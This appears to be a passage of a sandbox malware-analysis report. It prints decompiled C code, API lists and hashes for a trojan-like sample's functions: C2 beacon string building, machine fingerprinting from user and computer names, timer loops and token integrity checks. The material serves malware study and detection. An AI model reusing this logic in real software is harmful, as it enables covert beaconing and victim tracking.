                                          • Opcode Fuzzy Hash: d7e1c58278dea2b7ada66a3cd207634ef08de1f89917bf4eee8a3f8e05f57bdf
                                          • Instruction Fuzzy Hash: DF21E6B290022CBBDF01AFA5DD859DEBFBEEF48740F144026FA00A6150D7759A45EFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E04FD1754(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                          				void* _v8;
                                          				signed int _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				void* _v24;
                                          				void* _v28;
                                          				void* __ebx;
                                          				void* __edi;
                                          				long _t60;
                                          				intOrPtr _t61;
                                          				intOrPtr _t62;
                                          				intOrPtr _t63;
                                          				intOrPtr _t64;
                                          				intOrPtr _t65;
                                          				void* _t68;
                                          				intOrPtr _t69;
                                          				int _t72;
                                          				void* _t73;
                                          				void* _t74;
                                          				void* _t76;
                                          				void* _t79;
                                          				intOrPtr _t83;
                                          				intOrPtr _t87;
                                          				intOrPtr* _t89;
                                          				intOrPtr _t95;
                                          				void* _t97;
                                          				intOrPtr _t104;
                                          				signed int _t108;
                                          				char** _t110;
                                          				int _t113;
                                          				signed int _t115;
                                          				intOrPtr* _t116;
                                          				intOrPtr* _t118;
                                          				intOrPtr* _t120;
                                          				intOrPtr* _t122;
                                          				intOrPtr _t125;
                                          				intOrPtr _t130;
                                          				int _t134;
                                          				CHAR* _t136;
                                          				intOrPtr _t137;
                                          				void* _t138;
                                          				void* _t147;
                                          				int _t148;
                                          				void* _t149;
                                          				intOrPtr _t150;
                                          				void* _t152;
                                          				long _t156;
                                          				intOrPtr* _t157;
                                          				intOrPtr* _t158;
                                          				intOrPtr* _t161;
                                          				void* _t162;
                                          				void* _t164;
                                          
                                          				_t147 = __edx;
                                          				_t138 = __ecx;
                                          				_t60 = __eax;
                                          				_v12 = 8;
                                          				if(__eax == 0) {
                                          					_t60 = GetTickCount();
                                          				}
                                          				_t61 =  *0x4fdd018; // 0x3df0b315
                                          				asm("bswap eax");
                                          				_t62 =  *0x4fdd014; // 0x3a87c8cd
                                          				_t136 = _a16;
                                          				asm("bswap eax");
                                          				_t63 =  *0x4fdd010; // 0xd8d2f808
                                          				asm("bswap eax");
                                          				_t64 =  *0x4fdd00c; // 0x8f8f86c2
                                          				asm("bswap eax");
                                          				_t65 =  *0x4fdd2a4; // 0x254a5a8
                                          				_t3 = _t65 + 0x4fde633; // 0x74666f73
                                          				_t148 = wsprintfA(_t136, _t3, 3, 0x3d137, _t64, _t63, _t62, _t61,  *0x4fdd02c,  *0x4fdd004, _t60);
                                          				_t68 = E04FD57AB();
                                          				_t69 =  *0x4fdd2a4; // 0x254a5a8
                                          				_t4 = _t69 + 0x4fde673; // 0x74707526
                                          				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
                                          				_t164 = _t162 + 0x38;
                                          				_t149 = _t148 + _t72; // executed
                                          				_t73 = E04FD73E9(_t138); // executed
                                          				_t137 = __imp__;
                                          				_v8 = _t73;
                                          				if(_t73 != 0) {
                                          					_t130 =  *0x4fdd2a4; // 0x254a5a8
                                          					_t7 = _t130 + 0x4fde8cb; // 0x736e6426
                                          					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
                                          					_t164 = _t164 + 0xc;
                                          					_t149 = _t149 + _t134;
                                          					HeapFree( *0x4fdd238, 0, _v8);
                                          				}
                                          				_t74 = E04FD614A();
                                          				_v8 = _t74;
                                          				if(_t74 != 0) {
                                          					_t125 =  *0x4fdd2a4; // 0x254a5a8
                                          					_t11 = _t125 + 0x4fde8d3; // 0x6f687726
                                          					wsprintfA(_t149 + _a16, _t11, _t74);
                                          					_t164 = _t164 + 0xc;
                                          					HeapFree( *0x4fdd238, 0, _v8);
                                          				}
                                          				_t150 =  *0x4fdd324; // 0x75295b0
                                          				_t76 = E04FD757B(0x4fdd00a, _t150 + 4);
                                          				_t156 = 0;
                                          				_v20 = _t76;
                                          				if(_t76 == 0) {
                                          					L26:
                                          					RtlFreeHeap( *0x4fdd238, _t156, _a16); // executed
                                          					return _v12;
                                          				} else {
                                          					_t79 = RtlAllocateHeap( *0x4fdd238, 0, 0x800);
                                          					_v8 = _t79;
                                          					if(_t79 == 0) {
                                          						L25:
                                          						HeapFree( *0x4fdd238, _t156, _v20);
                                          						goto L26;
                                          					}
                                          					E04FD749F(GetTickCount());
                                          					_t83 =  *0x4fdd324; // 0x75295b0
                                          					__imp__(_t83 + 0x40);
                                          					asm("lock xadd [eax], ecx");
                                          					_t87 =  *0x4fdd324; // 0x75295b0
                                          					__imp__(_t87 + 0x40);
                                          					_t89 =  *0x4fdd324; // 0x75295b0
                                          					_t152 = E04FD4D2C(1, _t147, _a16,  *_t89);
                                          					_v28 = _t152;
                                          					asm("lock xadd [eax], ecx");
                                          					if(_t152 == 0) {
                                          						L24:
                                          						HeapFree( *0x4fdd238, _t156, _v8);
                                          						goto L25;
                                          					}
                                          					StrTrimA(_t152, 0x4fdc294);
                                          					_t95 =  *0x4fdd2a4; // 0x254a5a8
                                          					_push(_t152);
                                          					_t18 = _t95 + 0x4fde252; // 0x616d692f
                                          					_t97 = E04FD9DEF(_t18);
                                          					_v16 = _t97;
                                          					if(_t97 == 0) {
                                          						L23:
                                          						HeapFree( *0x4fdd238, _t156, _t152);
                                          						goto L24;
                                          					}
                                          					_t157 = __imp__;
                                          					 *_t157(_t152, _a4);
                                          					 *_t157(_v8, _v20);
                                          					_t158 = __imp__;
                                          					 *_t158(_v8, _v16);
                                          					 *_t158(_v8, _t152);
                                          					_t104 = E04FDA5E9(0, _v8);
                                          					_a4 = _t104;
                                          					if(_t104 == 0) {
                                          						_v12 = 8;
                                          						L21:
                                          						E04FD6106();
                                          						L22:
                                          						HeapFree( *0x4fdd238, 0, _v16);
                                          						_t156 = 0;
                                          						goto L23;
                                          					}
                                          					_t108 = E04FD2F2A(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
                                          					_v12 = _t108;
                                          					if(_t108 == 0) {
                                          						_t161 = _v24;
                                          						_t115 = E04FDA060(_t161, _a4, _a8, _a12); // executed
                                          						_v12 = _t115;
                                          						_t116 =  *((intOrPtr*)(_t161 + 8));
                                          						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
                                          						_t118 =  *((intOrPtr*)(_t161 + 8));
                                          						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                          						_t120 =  *((intOrPtr*)(_t161 + 4));
                                          						 *((intOrPtr*)( *_t120 + 8))(_t120);
                                          						_t122 =  *_t161;
                                          						 *((intOrPtr*)( *_t122 + 8))(_t122);
                                          						E04FD147E(_t161);
                                          					}
                                          					if(_v12 != 0x10d2) {
                                          						L16:
                                          						if(_v12 == 0) {
                                          							_t110 = _a8;
                                          							if(_t110 != 0) {
                                          								_t153 =  *_t110;
                                          								_t159 =  *_a12;
                                          								wcstombs( *_t110,  *_t110,  *_a12);
                                          								_t113 = E04FD1600(_t153, _t153, _t159 >> 1);
                                          								_t152 = _v28;
                                          								 *_a12 = _t113;
                                          							}
                                          						}
                                          						goto L19;
                                          					} else {
                                          						if(_a8 != 0) {
                                          							L19:
                                          							E04FD147E(_a4);
                                          							if(_v12 == 0 || _v12 == 0x10d2) {
                                          								goto L22;
                                          							} else {
                                          								goto L21;
                                          							}
                                          						}
                                          						_v12 = _v12 & 0x00000000;
                                          						goto L16;
                                          					}
                                          				}
                                          			}


                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04FD1768
                                          • wsprintfA.USER32 ref: 04FD17B8
                                          • wsprintfA.USER32 ref: 04FD17D5
                                          • wsprintfA.USER32 ref: 04FD1801
                                          • HeapFree.KERNEL32(00000000,?), ref: 04FD1813
                                          • wsprintfA.USER32 ref: 04FD1834
                                          • HeapFree.KERNEL32(00000000,?), ref: 04FD1844
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04FD1872
                                          • GetTickCount.KERNEL32 ref: 04FD1883
                                          • RtlEnterCriticalSection.NTDLL(07529570), ref: 04FD1897
                                          • RtlLeaveCriticalSection.NTDLL(07529570), ref: 04FD18B5
                                            • Part of subcall function 04FD4D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04FD52FE,?,075295B0), ref: 04FD4D57
                                            • Part of subcall function 04FD4D2C: lstrlen.KERNEL32(?,?,?,04FD52FE,?,075295B0), ref: 04FD4D5F
                                            • Part of subcall function 04FD4D2C: strcpy.NTDLL ref: 04FD4D76
                                            • Part of subcall function 04FD4D2C: lstrcat.KERNEL32(00000000,?), ref: 04FD4D81
                                            • Part of subcall function 04FD4D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04FD52FE,?,075295B0), ref: 04FD4D9E
                                          • StrTrimA.SHLWAPI(00000000,04FDC294,?,075295B0), ref: 04FD18EC
                                            • Part of subcall function 04FD9DEF: lstrlen.KERNEL32(?,00000000,00000000,04FD5335,616D692F,00000000), ref: 04FD9DFB
                                            • Part of subcall function 04FD9DEF: lstrlen.KERNEL32(?), ref: 04FD9E03
                                            • Part of subcall function 04FD9DEF: lstrcpy.KERNEL32(00000000,?), ref: 04FD9E1A
                                            • Part of subcall function 04FD9DEF: lstrcat.KERNEL32(00000000,?), ref: 04FD9E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04FD1919
                                          • lstrcpy.KERNEL32(?,?), ref: 04FD1921
                                          • lstrcat.KERNEL32(?,?), ref: 04FD192F
                                          • lstrcat.KERNEL32(?,00000000), ref: 04FD1935
                                            • Part of subcall function 04FDA5E9: lstrlen.KERNEL32(?,00000000,04FDD330,00000001,04FD937A,04FDD00C,04FDD00C,00000000,00000005,00000000,00000000,?,?,?,04FD207E,?), ref: 04FDA5F2
                                            • Part of subcall function 04FDA5E9: mbstowcs.NTDLL ref: 04FDA619
                                            • Part of subcall function 04FDA5E9: memset.NTDLL ref: 04FDA62B
                                          • wcstombs.NTDLL ref: 04FD19C8
                                            • Part of subcall function 04FDA060: SysAllocString.OLEAUT32(?), ref: 04FDA09B
                                            • Part of subcall function 04FDA060: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 04FDA11E
                                            • Part of subcall function 04FD147E: HeapFree.KERNEL32(00000000,00000000,04FD1D11,00000000,?,?,-00000008), ref: 04FD148A
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04FD1A09
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 04FD1A15
                                          • HeapFree.KERNEL32(00000000,?,?,075295B0), ref: 04FD1A21
                                          • HeapFree.KERNEL32(00000000,?), ref: 04FD1A2D
                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 04FD1A39
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                          • String ID:
                                          • API String ID: 603507560-0
                                          • Opcode ID: d76e755c44b2a87a84e914a67ef4cc3e54c6906dacaf5be1467ca6efb99244d4
                                          • Instruction ID: 8b1065bafad7b454c1fc8ae6d9bf8a925030c1d32a4931692b0688ddb3ac5368
                                          • Opcode Fuzzy Hash: d76e755c44b2a87a84e914a67ef4cc3e54c6906dacaf5be1467ca6efb99244d4
                                          • Instruction Fuzzy Hash: 87913971901109AFDB11EFA4ED88A9E7BBAEF49314F184164F408D7260D739ED52DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 83%
                                          			E04FD9B6F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				void _v48;
                                          				long _v52;
                                          				struct %anon52 _v60;
                                          				char _v72;
                                          				long _v76;
                                          				void* _v80;
                                          				union _LARGE_INTEGER _v84;
                                          				struct %anon52 _v92;
                                          				void* _v96;
                                          				void* _v100;
                                          				union _LARGE_INTEGER _v104;
                                          				long _v108;
                                          				intOrPtr _v120;
                                          				struct %anon52 _v128;
                                          				struct %anon52 _t46;
                                          				void* _t51;
                                          				long _t53;
                                          				void* _t54;
                                          				struct %anon52 _t60;
                                          				long _t64;
                                          				struct %anon52 _t65;
                                          				void* _t68;
                                          				void* _t72;
                                          				signed int _t73;
                                          				void* _t75;
                                          				void* _t78;
                                          				void** _t82;
                                          				signed int _t86;
                                          				void* _t89;
                                          
                                          				_t75 = __edx;
                                          				_v52 = 0;
                                          				memset( &_v48, 0, 0x2c);
                                          				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                          				_v60 = _t46;
                                          				if(_t46 == 0) {
                                          					_v92.HighPart = GetLastError();
                                          				} else {
                                          					_push(0xffffffff);
                                          					_push(0xff676980);
                                          					_push(0);
                                          					_push( *0x4fdd240);
                                          					_v76 = 0;
                                          					_v80 = 0;
                                          					L04FDB088();
                                          					_v84.LowPart = _t46;
                                          					_v80 = _t75;
                                          					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                                          					_t51 =  *0x4fdd26c; // 0x3d0
                                          					_v76 = _t51;
                                          					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                                          					_v108 = _t53;
                                          					if(_t53 == 0) {
                                          						if(_a8 != 0) {
                                          							L4:
                                          							 *0x4fdd24c = 5;
                                          						} else {
                                          							_t68 = E04FD68CF(); // executed
                                          							if(_t68 != 0) {
                                          								goto L4;
                                          							}
                                          						}
                                          						_v104.LowPart = 0;
                                          						L6:
                                          						L6:
                                          						if(_v104.LowPart == 1 && ( *0x4fdd260 & 0x00000001) == 0) {
                                          							_v104.LowPart = 2;
                                          						}
                                          						_t73 = _v104.LowPart;
                                          						_t58 = _t73 << 4;
                                          						_t78 = _t89 + (_t73 << 4) + 0x3c;
                                          						_t74 = _t73 + 1;
                                          						_v92.LowPart = _t73 + 1;
                                          						_t60 = E04FD9F11(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
                                          						_v128.LowPart = _t60;
                                          						if(_t60 != 0) {
                                          							goto L17;
                                          						}
                                          						_t65 = _v92;
                                          						_v104.LowPart = _t65;
                                          						_t97 = _t65 - 3;
                                          						if(_t65 != 3) {
                                          							goto L6;
                                          						} else {
                                          							_v120 = E04FD54AC(_t74, _t97,  &_v72, _a4, _a8);
                                          						}
                                          						goto L12;
                                          						L17:
                                          						__eflags = _t60 - 0x10d2;
                                          						if(_t60 != 0x10d2) {
                                          							_push(0xffffffff);
                                          							_push(0xff676980);
                                          							_push(0);
                                          							_push( *0x4fdd244);
                                          							goto L21;
                                          						} else {
                                          							__eflags =  *0x4fdd248; // 0x0
                                          							if(__eflags == 0) {
                                          								goto L12;
                                          							} else {
                                          								_t60 = E04FD6106();
                                          								_push(0xffffffff);
                                          								_push(0xdc3cba00);
                                          								_push(0);
                                          								_push( *0x4fdd248);
                                          								L21:
                                          								L04FDB088();
                                          								_v104.LowPart = _t60;
                                          								_v100 = _t78;
                                          								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                                          								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                                          								_v128 = _t64;
                                          								__eflags = _t64;
                                          								if(_t64 == 0) {
                                          									goto L6;
                                          								} else {
                                          									goto L12;
                                          								}
                                          							}
                                          						}
                                          						L25:
                                          					}
                                          					L12:
                                          					_t82 =  &_v72;
                                          					_t72 = 3;
                                          					do {
                                          						_t54 =  *_t82;
                                          						if(_t54 != 0) {
                                          							HeapFree( *0x4fdd238, 0, _t54);
                                          						}
                                          						_t82 =  &(_t82[4]);
                                          						_t72 = _t72 - 1;
                                          					} while (_t72 != 0);
                                          					CloseHandle(_v80);
                                          				}
                                          				return _v92.HighPart;
                                          				goto L25;
                                          			}

































                                          APIs
                                          • memset.NTDLL ref: 04FD9B89
                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04FD9B95
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04FD9BBD
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04FD9BDD
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,04FD4AC4,?), ref: 04FD9BF8
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,04FD4AC4,?,00000000), ref: 04FD9CA0
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04FD4AC4,?,00000000,?,?), ref: 04FD9CB0
                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04FD9CEA
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 04FD9D04
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04FD9D10
                                            • Part of subcall function 04FD68CF: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,07529388,00000000,?,7519F710,00000000,7519F730), ref: 04FD691E
                                            • Part of subcall function 04FD68CF: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,075293C0,?,00000000,30314549,00000014,004F0053,0752937C), ref: 04FD69BB
                                            • Part of subcall function 04FD68CF: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04FD9C10), ref: 04FD69CD
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04FD4AC4,?,00000000,?,?), ref: 04FD9D23
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                          • String ID:
                                          • API String ID: 3521023985-0
                                          • Opcode ID: 80a72a67d9a1efa0e86f4f7c0ba488e1a4081f39d96c3548742b8b54120b84c9
                                          • Instruction ID: ecd39d707230d1cbbd864d857644d09c992f04e1b98d87cfd3507ddc5fd9434a
                                          • Opcode Fuzzy Hash: 80a72a67d9a1efa0e86f4f7c0ba488e1a4081f39d96c3548742b8b54120b84c9
                                          • Instruction Fuzzy Hash: 6351BDB1409325AFD720AF65DC44DABBBEAEF85724F448A1DF8A4D2140D7B0E905CF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E04FD1A4E(intOrPtr __edx, void** _a4, void** _a8) {
                                          				intOrPtr _v8;
                                          				struct _FILETIME* _v12;
                                          				short _v56;
                                          				struct _FILETIME* _t12;
                                          				intOrPtr _t13;
                                          				void* _t17;
                                          				void* _t21;
                                          				intOrPtr _t27;
                                          				long _t28;
                                          				void* _t30;
                                          
                                          				_t27 = __edx;
                                          				_t12 =  &_v12;
                                          				GetSystemTimeAsFileTime(_t12);
                                          				_push(0x192);
                                          				_push(0x54d38000);
                                          				_push(_v8);
                                          				_push(_v12);
                                          				L04FDB082();
                                          				_push(_t12);
                                          				_v12 = _t12;
                                          				_t13 =  *0x4fdd2a4; // 0x254a5a8
                                          				_t5 = _t13 + 0x4fde836; // 0x7528dde
                                          				_t6 = _t13 + 0x4fde59c; // 0x530025
                                          				_push(0x16);
                                          				_push( &_v56);
                                          				_v8 = _t27;
                                          				L04FDAD1A();
                                          				_t17 = CreateFileMappingW(0xffffffff, 0x4fdd2a8, 4, 0, 0x1000,  &_v56); // executed
                                          				_t30 = _t17;
                                          				if(_t30 == 0) {
                                          					_t28 = GetLastError();
                                          				} else {
                                          					if(GetLastError() == 0xb7) {
                                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                          						if(_t21 == 0) {
                                          							_t28 = GetLastError();
                                          							if(_t28 != 0) {
                                          								goto L6;
                                          							}
                                          						} else {
                                          							 *_a4 = _t30;
                                          							 *_a8 = _t21;
                                          							_t28 = 0;
                                          						}
                                          					} else {
                                          						_t28 = 2;
                                          						L6:
                                          						CloseHandle(_t30);
                                          					}
                                          				}
                                          				return _t28;
                                          			}














                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,04FD4996,?,?,4D283A53,?,?), ref: 04FD1A5A
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04FD1A70
                                          • _snwprintf.NTDLL ref: 04FD1A95
                                          • CreateFileMappingW.KERNELBASE(000000FF,04FDD2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 04FD1AB1
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04FD4996,?,?,4D283A53,?), ref: 04FD1AC3
                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 04FD1ADA
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,04FD4996,?,?,4D283A53), ref: 04FD1AFB
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04FD4996,?,?,4D283A53,?), ref: 04FD1B03
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1814172918-0
                                          • Opcode ID: aed3293294ea111aa043d9fe75fb3d641aa1bf7db4f288433ddaa24c109f72af
                                          • Instruction ID: f8e2134d1039d83c0b03ee482a6ff5ef494ac86cc8cd04b38f735fe1e46012d8
                                          • Opcode Fuzzy Hash: aed3293294ea111aa043d9fe75fb3d641aa1bf7db4f288433ddaa24c109f72af
                                          • Instruction Fuzzy Hash: 6B21C376A41208BBD721EF78DD49F8937ABEF44701F194221F605E7180EA74E906DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 139 4fd93d5-4fd93e9 140 4fd93eb-4fd93f0 139->140 141 4fd93f3-4fd9405 call 4fd6f89 139->141 140->141 144 4fd9459-4fd9466 141->144 145 4fd9407-4fd9417 GetUserNameW 141->145 146 4fd9468-4fd947f GetComputerNameW 144->146 145->146 147 4fd9419-4fd9429 RtlAllocateHeap 145->147 148 4fd94bd-4fd94e1 146->148 149 4fd9481-4fd9492 RtlAllocateHeap 146->149 147->146 150 4fd942b-4fd9438 GetUserNameW 147->150 149->148 151 4fd9494-4fd949d GetComputerNameW 149->151 152 4fd9448-4fd9457 HeapFree 150->152 153 4fd943a-4fd9446 call 4fd7cf7 150->153 154 4fd949f-4fd94ab call 4fd7cf7 151->154 155 4fd94ae-4fd94b7 HeapFree 151->155 152->146 153->152 154->155 155->148
                                          C-Code - Quality: 96%
                                          			E04FD93D5(char __eax, void* __esi) {
                                          				long _v8;
                                          				char _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v28;
                                          				long _t34;
                                          				signed int _t39;
                                          				long _t50;
                                          				char _t59;
                                          				intOrPtr _t61;
                                          				void* _t62;
                                          				void* _t64;
                                          				char _t65;
                                          				intOrPtr* _t67;
                                          				void* _t68;
                                          				void* _t69;
                                          
                                          				_t69 = __esi;
                                          				_t65 = __eax;
                                          				_v8 = 0;
                                          				_v12 = __eax;
                                          				if(__eax == 0) {
                                          					_t59 =  *0x4fdd270; // 0xd448b889
                                          					_v12 = _t59;
                                          				}
                                          				_t64 = _t69;
                                          				E04FD6F89( &_v12, _t64);
                                          				if(_t65 != 0) {
                                          					 *_t69 =  *_t69 ^  *0x4fdd2a0 ^ 0x76f6612d;
                                          				} else {
                                          					GetUserNameW(0,  &_v8); // executed
                                          					_t50 = _v8;
                                          					if(_t50 != 0) {
                                          						_t62 = RtlAllocateHeap( *0x4fdd238, 0, _t50 + _t50);
                                          						if(_t62 != 0) {
                                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                                          								_t64 = _t62;
                                          								 *_t69 =  *_t69 ^ E04FD7CF7(_v8 + _v8, _t64);
                                          							}
                                          							HeapFree( *0x4fdd238, 0, _t62);
                                          						}
                                          					}
                                          				}
                                          				_t61 = __imp__;
                                          				_v8 = _v8 & 0x00000000;
                                          				GetComputerNameW(0,  &_v8);
                                          				_t34 = _v8;
                                          				if(_t34 != 0) {
                                          					_t68 = RtlAllocateHeap( *0x4fdd238, 0, _t34 + _t34);
                                          					if(_t68 != 0) {
                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                          							_t64 = _t68;
                                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04FD7CF7(_v8 + _v8, _t64);
                                          						}
                                          						HeapFree( *0x4fdd238, 0, _t68);
                                          					}
                                          				}
                                          				asm("cpuid");
                                          				_t67 =  &_v28;
                                          				 *_t67 = 1;
                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                                          				 *(_t67 + 0xc) = _t64;
                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                          				return _t39;
                                          			}




















                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04FD940C
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04FD9423
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04FD9430
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04FD9451
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04FD9478
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04FD948C
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04FD9499
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04FD94B7
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: HeapName$AllocateComputerFreeUser
                                          • String ID:
                                          • API String ID: 3239747167-0
                                          • Opcode ID: fd46ec856291b111214c7e4db4d84c80292939e461d6d0fd1490311c613acc55
                                          • Instruction ID: 061149cb30cef56d6816ce6130d4c3a22c9a80533a2f8357e755f42183b20449
                                          • Opcode Fuzzy Hash: fd46ec856291b111214c7e4db4d84c80292939e461d6d0fd1490311c613acc55
                                          • Instruction Fuzzy Hash: B23128B2A01209EFEB10DFB9EC80AAEB7FAFF44204F558569E505D7210D774EE029B10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 100%
                                          			E04FD53E3(long* _a4) {
                                          				long _v8;
                                          				void* _v12;
                                          				void _v16;
                                          				long _v20;
                                          				int _t33;
                                          				void* _t46;
                                          
                                          				_v16 = 1;
                                          				_v20 = 0x2000;
                                          				if( *0x4fdd25c > 5) {
                                          					_v16 = 0;
                                          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                          						_v8 = 0;
                                          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                          						if(_v8 != 0) {
                                          							_t46 = E04FD58BE(_v8);
                                          							if(_t46 != 0) {
                                          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                          								if(_t33 != 0) {
                                          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                          								}
                                          								E04FD147E(_t46);
                                          							}
                                          						}
                                          						CloseHandle(_v12);
                                          					}
                                          				}
                                          				 *_a4 = _v20;
                                          				return _v16;
